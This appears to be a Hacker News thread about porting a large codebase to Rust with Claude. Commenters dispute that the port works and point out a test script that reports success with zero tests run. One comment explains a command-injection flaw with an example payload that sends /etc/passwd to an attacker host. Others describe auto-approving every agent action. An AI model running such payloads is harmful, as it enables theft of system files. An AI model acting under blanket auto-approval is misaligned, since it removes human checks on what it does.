    "I used claude to port a large Rust codebase to Python and it's been a game changer. Whereas I was always fighting with the Rust compiler, now I can iterate very quickly in python and it just stays out of my way. I'm adding thousands of lines of working code per day with the help of AI."

    I always cringe when I read stuff like this because (at my company at least) a lot of research code ends up getting shipped directly to production, since nobody understands how it works except the researchers. Inevitably it proves to be very fragile, untyped code that dumps stack traces whenever runtime issues happen (which is quite frequent at first, until whack-a-mole sorts them out over time).

  • b00ty4breakfast 3 days ago ago

    >I realized that I could run an AppleScript that presses enter every few seconds in another tab. This way it's going to say Yes to everything Claude asks to do.

    this is so silly, I can't help but respect the kludge game

  • omnicognate 2 days ago ago

    Like a couple of others here I tried checking out this project [1] and running these 2.3 million random battles. The README says everything needs to be run in docker, and indeed the test script uses docker and fails without it, but there are no docker/compose files in the repo.

    It's great that the repo is provided, but people are clamouring for proof of the extraordinary powers of AI. If the claim is that it allowed 100 kloc to be ported in one month by one dev and the result passes a gazillion tests that prove it actually replicates the desired functionality, that's really interesting! How hard would it be, then, to actually have the repo in a state where people can run those tests?

    Unless the repo is updated so the tests can be run, my default assumption has to be that the whole thing is broken to the point of uselessness.

    [1] Link buried at the end: https://github.com/vjeux/pokemon-showdown-rs

  • jbonatakis 3 days ago ago

    > I have never written any line of Rust before in my life

    As an experiment/exercise this is cool, but having a 100k loc codebase to maintain in a language I’ve never used sounds like a nightmare scenario.

    • Herring 3 days ago ago

      I think the plan is for Claude to maintain it. He hasn't read a single line of code.

      • seanclayton 2 days ago ago

        code that no human will ever read or understand, sounds like a good idea

        • Herring 2 days ago ago

          We don’t read assembly either any more. The sexy new programming language for 2026 is English.

          • ModernMech 2 days ago ago

            > We don’t read assembly either any more.

            Speak for yourself? In absolute terms there are probably more people reading assembly now than in its heyday.

            Moreover, assembly isn't generated, it's compiled, which is a completely different (and more reliable) process than generating source.

          • ares623 2 days ago ago

            Do you review and approve plaintext plans in your org and ship whatever Claude outputs that passes CI to prod without further review? Because that's what we do for assembly.

            • Herring 2 days ago ago

              I think the point is that's where all the big tech companies say we're heading. I can't say I endorse it, but the OP who just left it running for a month seems to like it.

              • 2 days ago ago
                [deleted]
          • gaigalas 2 days ago ago

            You are mistaken. People totally do read and write assembly.

          • seanclayton 2 days ago ago

            You can determine and justify why generated assembly looks the way it does, because it's made by a deterministic machine. How is an LLM's output deterministic and justifiable? How can one hold anyone to account for what spews out of a large language model?

        • djb_hackernews 2 days ago ago

          you don't think that's where we are headed?

          • seanclayton 2 days ago ago

            Oh no doubt, but the people who want that are wrong.

    • cies 3 days ago ago

      I kind of expect that code to be full of non-idiomatic Rust code that mimics a GC'ed language...

      Once that's also "fixed", it may well be a lot faster than the current Rust version.

      • galangalalgol 3 days ago ago

        That isn't what I've seen. It seems to use every language in the way that's idiomatic for it, or more accurately, in the way it has seen that language be used. Rust written that way isn't present in its training corpus, so it doesn't do that. I would be more concerned about it getting creative and adding something a cool Rustacean might add in the porting process that you don't actually want.

  • citizenpaul 3 days ago ago

    Am I the only one who is going to call this out? Am I the only person who cloned the repo to run it and found out it does nothing? This is disingenuous at best. This is not a working project; they even admit this at the end of the article, just not directly.

    >Sadly I didn't get to build the Pokemon Battle AI and the winter break is over, so if anybody wants to do it, please have fun with the codebase!

    In other words, this is just another smoking wreck of a hopelessly incomplete project on GitHub. There are even instructions for running it in a Docker setup that doesn't exist. How would I have fun with a nonsense codebase?

    The author just did a massive AI slop generation run and assumes the code works because it compiles and some equivalent-output tests worked. All that was proved here is that, by wasting a month of time, you can individually rewrite a bunch of functions in a language you don't know (if you already know how to program) and it will compile. This has been known for 2-3 years now.

    This is just AI propaganda or resume padding. Nothing was ported or done here.

    Sorry what I meant to say is AI is revolutionary and changing the world for the better................................

    • starvit35 2 days ago ago

      No, you're right. I find it wild that yours is the only comment in this thread calling this out.

      this project is just a literal waste of energy

  • timcobb 3 days ago ago

    How much does it cost to run Claude Code 24 hrs/day like this? Does the $200/month plan hold up? My spend on Cursor has been high... I'm wondering if I can just collapse it into a $200/month CC subscription.

    • alecco 3 days ago ago

      This guy tested it: https://she-llac.com/claude-limits

      "Suspiciously precise floats, or, how I got Claude's real limits" 19hs ago 25 points https://news.ycombinator.com/item?id=46756742

      OTOH, with ChatGPT/Codex limits are less of a problem, in general.

      • esafak 3 days ago ago

        Because Codex effectively rate limits you by being so slow.

        • elcritch 2 days ago ago

          It’s slower but generally spits out more reliable code, IMHO.

          • timcobb a day ago ago

            Not in my experience recently. Are you using it via Cursor, or how?

    • vidarh 3 days ago ago

      If you're using it 24h/day you probably will run into the limits, unless you're very careful about managing context and/or the requests are punctuated by long-running tool use (e.g. time-consuming test suites).

      I'm on the $200/month plan, and I do have Claude running unattended for hours at a time. I have hit the weekly limits at times of particularly aggressive use (multiple sessions in parallel for hours at a time), but since that involved more than one session at a time, I'm not really sure how close I got to the equivalent of one session running 24/7.

      • pigeonhole123 3 days ago ago

        How do you prompt it so it can run many hours at a time? Or do you run it in some kind of loop that you manage yourself?

        • vidarh 2 days ago ago

          Make it write a plan or todo list, and then make it spawn sub agents to execute. If you have the main agent do the work it will soon go off plan and stop, but when it's just spawning agents, it will be willing to run for a very long time.

          Also take care to tell it what it should solve itself rather than stop and ask you for help with, and run it contained so you can turn on yolo mode.

        • Rumudiez 3 days ago ago

          If you do enough planning up front, you can get a swarm of agents to run for hours on end, completing all the tasks autonomously. I have a test project that uses GitHub issues as a kanban board; I iterate with the primary chat interface to refine a local ROADMAP.md file and then tell it "get started".

          It took several sessions of this to refine the workflow docs to something Claude + subagents would stick to regarding branching strategy and integration requirements, but it runs well enough. My main bottleneck now is CI, but I still hit the weekly limit on Claude Max from just a handful of these sessions each week, and it's about all the spare time I have for manual QA anyway.

    • kvdveer 3 days ago ago

      There's a daily token limit. While I've never run into that limit while operating Claude as a human, I have received warnings that I'm getting close. I imagine that an unattended setup will blow through the token limit in not too much time.

    • storystarling 3 days ago ago

      I built a similar autonomous loop using LangGraph for a publishing backend and the raw API costs were significantly higher than $200. The subscription model likely has opaque usage limits that trigger fairly quickly under that kind of load. For a bootstrapped setup I usually find the predictability of the API bill worth the premium over hitting a black box limit.

    • tom1337 3 days ago ago

      I have no first-hand experience with the Max subscription (which the $200 plan is), but having read a few discussions here and on GitHub [1], it seems that Anthropic has tanked the usage limits in the last few weeks, and thus I would argue that you would run into limits pretty quickly if you were using it (unsupervised) for 24h each day.

      1) https://github.com/anthropics/claude-code/issues/16157

      • hombre_fatal 3 days ago ago

        The employee in that thread claims that they didn't change the rate limits and when they look into it, it's usually noob error.

        It's a really low-quality GitHub issue thread. People are making claims with zero data, just vibes, yet it would be trivial to get the data to back the claims.

        The guy who responds to the employee even claims that his "lawyer is already on the case" in some lame threat.

        I wonder how many of these people had 30 MCP servers installed using 150k of their 200k context in every prompt.

        • tom1337 2 days ago ago

          Yea, there are some weird replies in that thread. My highlights were "This is my livelihood, not a hobby or sideproject" and "I just purchased a third $200 MAX plan and instantly hit rate limits". While I agree that it might not be Anthropic's fault, I've gotta admit that I found Anthropic to be rather vague regarding their rate limits. They seem to have totally dynamic rate limits based on usage rather than a fixed "messages per hour" or "tokens per hour" approach. Their free tier usage page states "Also, the number of messages you can send will vary based on demand, and we may impose other types of usage limits to ensure fair access to all users." [1] while the Pro plan page just says "During peak hours, the Pro plan offers at least five times the usage per session compared to our free service." [2] and Max then 5x or 20x it depending on the price you pay [3]. If they just have more demand or reduced the free tier rate limit, all plans have a reduced limit and it would be totally within what they've communicated. OpenAI at least gives you a specific amount of messages per timeframe (which I find more transparent). [4]

          1) https://support.claude.com/en/articles/8602283-about-free-cl... 2) https://support.claude.com/en/articles/8324991-about-claude-... 3) https://support.claude.com/en/articles/11014257-about-claude... 4) https://help.openai.com/en/articles/11909943-gpt-52-in-chatg...

  • lend000 3 days ago ago

    This seems like one of the best possible use cases for LLMs -- porting old, useful Python/JavaScript into faster compiled-language code. It's something I don't want to do, and it requires the type of intelligence that most people agree AI already has (following clear objectives, not needing much creativity or agency).

  • sebstefan 3 days ago ago

    >I've tried asking Claude to optimize it further, it created a plan that looks reasonable (I've never interacted with Rust in my life) and it spent a day building many of these optimizations but at the end of the day, none of them actually improved the runtime and some even made it way worse.

    This is the kind of thing where a real developer tweaking a codebase they're familiar with could get it done, but with AI there's a glass ceiling.

    • lelandfe 3 days ago ago

      Yeah, I had Claude spend a lot of time optimizing a JS bundling config (as a quite senior frontend) and it started on some things that looked insanely promising, which a newer FE dev would be thrilled about.

      I later realized it sped up the metric I'd asked about (build time) at the cost of all users downloading like 100x the amount of JS.

      • cies 3 days ago ago

        This is what LLMs are good at: generating what "look[s] insanely promising" to us humans.

    • jtbayly 3 days ago ago

      I just ran into the problem of extremely slow uploads in an app I was working on. Told Gemini to work on it, and it tried to get the timing of everything, then tried to optimize the slow parts of the code. After a long time, there might have been some improvements, but the basic problem remained: 5-10 seconds to upload an image from the same machine. Increasing the chunk size fixed the problem immediately.

      Even though the other optimizations might have been ok, some of them made things more complicated, so I reverted all of them.
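
      (A generic illustration of why the chunk size mattered, not the poster's actual stack: each chunk carries per-chunk overhead, so tiny chunks make a transfer round-trip-bound.)

        use std::io::{self, Read};

        // Upload a stream in fixed-size chunks; the per-chunk "send" stands in for
        // whatever overhead the real upload path has (request framing, acks, etc.).
        // With 4 KiB chunks a 10 MB image takes ~2500 sends; with 1 MiB chunks, ~10.
        const CHUNK_SIZE: usize = 1024 * 1024;

        fn upload<R: Read>(mut src: R) -> io::Result<usize> {
            let mut buf = vec![0u8; CHUNK_SIZE];
            let mut chunks = 0;
            loop {
                let n = src.read(&mut buf)?;
                if n == 0 {
                    break;
                }
                // send_chunk(&buf[..n]) would go here
                chunks += 1;
            }
            Ok(chunks)
        }

        fn main() -> io::Result<()> {
            let data = vec![0u8; 10 * 1024 * 1024]; // pretend 10 MB image
            let chunks = upload(&data[..])?;
            println!("sent {} chunks of up to {} bytes", chunks, CHUNK_SIZE);
            Ok(())
        }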

  • dicroce 3 days ago ago

    This is actually pretty incredible. Cannot really argue against the productivity in this case.

    • mythical_39 3 days ago ago

      One possible argument against the productivity is if the migration introduced too many bugs to be usable.

      In which case the code produced has zero value, resulting in a wasted month.

    • Sharlin 3 days ago ago

      I suppose what's impressive is that (with the author's help) it did ultimately get the port to work, in spite of all the caveats described by the author that make Claude sound like a really bad programmer. The code is likely terrible, and the 3.5x speedup is way low compared to what it could be, but I guess these days we're supposed to be impressed by quantity rather than quality.

      • 3 days ago ago
        [deleted]
    • citizenpaul 3 days ago ago

      It's not. The project does not work or actually implement anything. It just compiles and passes some arbitrary tests the author wrote.

      • woeirua 3 days ago ago

        We must have a different definition of arbitrary. OP ran 2.3 million tests comparing random battles against the original implementation? Which is probably what you or I would do if we were given this task without an LLM.

        • citizenpaul 2 days ago ago

          Well, I cloned the repo and can't run this battle test by following the instructions. A required file called dex.js appears to be missing, among other suspicious oddities for what looks, on the surface, like a well-organized project.

          I'm very suspicious of such projects, so take it for what you will, but I don't have time to debug some toy project. If it's presented as complete and the instructions don't work, that's a red flag for the increasingly AI-slop internet to me. I'm saying I think they may have used one simple trick called lying.

  • zakhio 2 days ago ago

    This reminded me of porting a low-level JS library and its tests (~10k LOC) to Java about 6 months ago (so mostly it was Sonnet 4).

    My goal was a 1:1 port, so that later I could easily port newer commits from the original repo. It wasn’t smooth, but in the end it worked.

    Findings:

    * a simple prompt like "port everything" didn’t work, as Sonnet kept falling into a loop of trying to fix code it couldn’t understand, so in the end it just deleted that part :))

    * I had to switch to a file-by-file approach: focus Claude on the base code first, then move to the files that use it

    * Sonnet had trouble following the 1:1 instruction; I saw missing parts of functions, missing comments, and even the simple instruction to keep the same order of functions in the file was ignored (I had to tell it explicitly to list the functions in the file and then create a separate TODO to port each one)

  • mktemp-d 3 days ago ago

    For typing “yes” or “y” automatically into command prompts without interacting, you could have used the command ‘yes’ and piped it into the process you’re running, as a first attempt at solving the yes problem. https://man7.org/linux/man-pages/man1/yes.1.html
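
    A minimal sketch of the same idea from Node, assuming a hypothetical ./setup.sh as the prompting process:

      import { spawn } from 'node:child_process';
      // Equivalent of `yes | ./setup.sh`: stream an endless "y\n" into the child's stdin.
      const yes = spawn('yes');
      const task = spawn('./setup.sh', { stdio: ['pipe', 'inherit', 'inherit'] });
      yes.stdout!.pipe(task.stdin!);
      task.on('close', () => yes.kill()); // stop `yes` once the real process exits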

    • rvz 3 days ago ago

      I don't think this is an actual problem and the prompt is there for a reason.

      Piping 'yes' to command prompts just to auto-approve any change isn't really a good idea, especially when the code / script can be malicious.

      • thunfischbrot 3 days ago ago

        And here I was hoping OP was being sarcastic. Yet it's reasonable we're nearing an AI-fueled Homer drinking bird scenario.

        Some concepts people try out using AI (for lack of a more specific word) are interesting. They will add to our collective understanding of when these tools, paired with meaningful methods, can be used to effectively achieve what seemed out of reach before.

        Unfortunately, it comes with many people rediscovering, badly, insights I thought we already had. Others use the tools without considering what they were looking to accomplish, or how they would know if they did.

      • ehutch79 3 days ago ago

        Isn't that the point of vibe coding? You don't even look at the code. Just trust the LLM to take the wheel.

        https://x.com/karpathy/status/1886192184808149383?lang=en

  • amelius 3 days ago ago

    I'm hoping that one day we can use AI to port the millions of lines in the modules of the Python ecosystem to a GIL-free version of Python.

  • ericol 3 days ago ago

    I recently had to create a MySQL shim for upgrading a large PHP codebase that is currently running on version 5.6 (Don't ask).

    The way I approached it (Yes, I know there are already existing shims, but I felt more comfortable vibe coding it than using something that might not cover all my use cases) was to:

    1. Extract the existing test suite [1] from the original PHP extension's repo (all .phpt files)

    2. Get Claude to iterate over the results of the tests while building the code

    3. Extract my complete list of called functions and fill the gaps

    4. Profit?

    When I finally got to test the shim, the fact that it ran on the first try was rather emotional.

    [1] My shim fails quite a lot of tests, but all of the failures are cosmetic (e.g., no deprecation warning) rather than functional.

  • DeathArrow 3 days ago ago

    This gives me hope that some people will use AI to port Javascript desktop apps to faster languages.

  • _pdp_ 3 days ago ago

    To be honest, I think it should be the other way around.

    TypeScript is a good high-level language that is versatile and well generated by LLMs, and there is good support for various linters and other code-support tools. You can probably knock out more TS code than Rust, and at a faster rate (just my hypothesis). For most intents and purposes this will be fine, but in cases where you want faster, lower-level code, you could use an LLM-backed compiler/translator. A specialised tool that compiles high-level code to Rust would actually be awesome, and I can see how it could potentially be a dedicated agent of sorts.

  • Pbhaskal 2 days ago ago

    One thing I learned from porting is that you should have end-to-end integration tests in place to ensure no major functionality is broken.
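
    Something like the seed-based comparison from the article works well as that safety net: run the reference implementation and the port on the same seeds and diff the output, so any behavioural divergence shows up immediately. A rough sketch (the entry points and flags here are hypothetical, not the actual harness):

      // differential-test.ts (hypothetical): compare old and new implementations seed by seed.
      import { execFileSync } from 'node:child_process';
      import { strict as assert } from 'node:assert';
      
      const runReference = (seed: number) =>
        execFileSync('node', ['sim.js', '--seed', String(seed)], { encoding: 'utf8' });
      const runPort = (seed: number) =>
        execFileSync('./target/release/sim', ['--seed', String(seed)], { encoding: 'utf8' });
      
      for (let seed = 1; seed <= 100; seed++) {
        // Identical output for the same seed means the port still behaves like the original.
        assert.equal(runPort(seed), runReference(seed), `output diverges at seed ${seed}`);
      }
      console.log('all seeds matched');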

  • kbmckenna 3 days ago ago

    Did you ever consider using something like Oh My Opencode [1]? I first saw it in the wake of Anthropic locking out Opencode. I haven’t used it but it appears to be better at running continuously until a task is finished. Wondering if anyone else has tried migrating a huge codebase like this.

    [1] https://github.com/code-yeongyu/oh-my-opencode

  • lasgawe 3 days ago ago

    At the current stage, the main issue is that when porting to a new language, some critical parts get missed. This increases the complexity of the codebase and leads to unnecessary code. In my personal opinion, creating a cross-language compiler is a better approach than this kind of porting, while also focusing on squeezing out performance.

  • dmix 2 days ago ago

    > For example, it created two different structures for what a move is in two different files so that they would both compile independently but didn't work when integrated together.

    This is the most annoying part of using LLMs blindly. The duplication.

  • aidos 2 days ago ago

    Let's hope Claude doesn't decide to run anything else through that git-server, since it's exec-ing whatever is posted over http.

    But hey, so long as it starts with 'git ' you're safe, riiiiight? Oh, 'git status; curl -X POST attacker.com -d @/etc/passwd'

    https://raw.githubusercontent.com/vjeux/pokemon-showdown-rs/...
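
    The whole class of bug is the "prefix check, then hand the string to a shell" pattern. Roughly, and purely as a hypothetical sketch (not the actual git-server code), the difference between the vulnerable shape and a safer one:

      import { exec, execFile } from 'node:child_process';
      
      // Vulnerable shape: the prefix check passes, then a shell interprets the whole
      // string, so 'git status; curl ...' happily runs both commands.
      function runUnsafe(posted: string) {
        if (posted.startsWith('git ')) exec(posted);
      }
      
      // Safer shape: no shell at all. Tokenize (naively, for the sketch), allow-list
      // the subcommand, and pass the arguments straight to the git binary.
      const ALLOWED = new Set(['status', 'log', 'diff', 'pull', 'push']);
      function runSafer(posted: string) {
        const [cmd, sub, ...args] = posted.trim().split(/\s+/);
        if (cmd !== 'git' || !ALLOWED.has(sub)) throw new Error('command rejected');
        execFile('git', [sub, ...args]);
      }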

    • narmiouh 2 days ago ago

      That's a good one.

      Seasoned developers who would not make such a mistake could still be led to think the LLM is writing safe code if they don't ever read it line by line.

      As for vibe coders who are not seasoned developers, I'm not sure they would even know this isn't safe code if they did read it line by line.

  • 2 days ago ago
    [deleted]
  • tmsacool 2 days ago ago

    Hey, even the README was vibe-coded!

    It probably works on his machine, but telling me to run it through Docker while not providing any Dockerfiles, or any other way to run the project, kind of makes me question the validity of the project, or at least not trust it.

    Whatever, I'll just build it manually and run the test:

      cargo build --release 
      
      ./tests/test-unified.sh 1 100
    
      Running battles...
      Error response from daemon: No such container: pokemon-rust-dev
      Comparing results...
    
      =======================================
      Summary
      =======================================
      Total: 100
      Passed: 0
      Failed: 0
    
      ALL SEEDS PASSED!
    
    Yay! But wait, actually no? I mean 0 == 0, so that's cool.

    Oh, the test script only works with a specifically named container, so I HAVE to create a Dockerfile and docker-compose.yml. But I guess this is just a Research Project so it's fine. I'll just ask Opus to create them. It will probably only take a minute.

    JK, it took like 5 minutes, because it had to figure out the Cargo/Rust version or something, I don't know :( So this better work or I've wasted my precious tokens!

    Ok so running cargo test inside the docker container just returns a bunch of errors:

      docker exec pokemon-rust-dev bash -c "cd /home/builder/workspace && cargo test 2>&1"
    
      error: could not compile `pokemon-showdown` (test "battle_simulation") due to 110 previous errors
    
    Let's try the test script:

      ./tests/test-unified.sh 1 100
    
      Building release version...
       = note: `#[warn(dead_code)]` on by default
    
      warning: `pokemon-showdown` (example "profile_battle") generated 1 warning
      warning: `pokemon-showdown` (example "detailed_profile") generated 1 warning
          Finished `release` profile [optimized] target(s) in 0.45s
    
      =======================================
      Unified Testing Seeds 1-100 (100 seeds)
      =======================================
    
      Running battles...
      Comparing results...
    
      =======================================
      Summary
      =======================================
      Total: 100
      Passed: 0
      Failed: 0
    
      ALL SEEDS PASSED!
    
    Yay! Wait, no. What did I miss? Maybe the test script needs the original TS source code to work? I cloned it into a folder next to this project and... nope, nothing.

    At this point I give up. I could not verify whether this port works. If it does, that's very, VERY cool. But I think when claiming something like this it is REALLY important to make it as easily verifiable as possible. I tried for like 20 minutes; if someone smarter than me figured it out, please tell me how you got the tests to pass.

    • duskdozer 2 days ago ago

      Can't you read? It says "ALL SEEDS PASSED!" right there at the end!

      • omnicognate 2 days ago ago

        It also says "Passed: 0".

        I probably got wooshed here. Anyway, the tests definitely aren't being run. I checked out the repo and tried it myself. The test script [1] outputs "ALL SEEDS PASSED!" when the number of failures is zero, which of course is the case if the entire thing just fails to run.

        [1] https://github.com/vjeux/pokemon-showdown-rs/blob/605247d012...
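
        Sketched out (in TypeScript for brevity; the real script is bash), the summary logic and the check it actually needs:

          // What the summary effectively does: "zero failures" prints success,
          // which is vacuously true when zero battles ran at all.
          function verdict(failed: number): string {
            return failed === 0 ? 'ALL SEEDS PASSED!' : `${failed} SEEDS FAILED`;
          }
          
          // What it should do: require that every seed actually ran and passed.
          function verdictFixed(total: number, passed: number, failed: number): string {
            if (total > 0 && failed === 0 && passed === total) return 'ALL SEEDS PASSED!';
            return `only ${passed}/${total} seeds passed (${failed} failed)`;
          }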

        • duskdozer 2 days ago ago

          Yeah, I was joking, but I'm... not totally convinced that couldn't have been the "tests passing" condition

  • RandomTeaParty 2 days ago ago

    How much did it cost?

  • 2 days ago ago
    [deleted]
  • skerit 3 days ago ago

    I've also done a few porting projects. It works great if you can do it file-per-file, class-per-class, really keeping a similar structure in the target as in the source. Porting _and_ improving or making small changes is a recipe for disaster.

  • Mizza 3 days ago ago

    At this rate, I am expecting that an AI will be able to port the entire Linux kernel to Rust by the end of the year.

    • Curzel 3 days ago ago

      I don’t know about the Linux kernel, but I’ll be surprised if we don’t have some “fully vibe coded OS” for Christmas (which would be cool to see)

  • seanclayton 2 days ago ago

    What are the known bugs?

  • gaigalas 2 days ago ago

    > requires my engineering expertise and constant babysitting

    What the skeptics have been saying all along.

  • mdavid626 3 days ago ago

    How do you create a mental model of that Rust code?

    You’re just creating slop.

  • animanoir 2 days ago ago

    [dead]

  • FAFOAlex 2 days ago ago

    [flagged]

  • Imustaskforhelp 3 days ago ago

    Honestly, I am really interested in trying to port the Rust code to multiple languages like Golang, Zig, and even niche languages like V-lang/Odin/Nim, etc.

    It would be interesting if we use this as a benchmark similar to https://benjdd.com/languages/ or https://benjdd.com/languages2/

    I used gitingest on the repository that they provided and it's around ~150k tokens.

    Currently I have pasted it into the free Gemini web app and asked it to write it in Golang. It said that a line-by-line port feels impossible, but I have specifically asked it to write it line by line, so it will be interesting to see what the project becomes (I don't have high hopes for the free tier of Gemini 3 Pro but yeah, if someone has the budget, then sure, they should probably do it).

    Edit: Reached rate limits lmao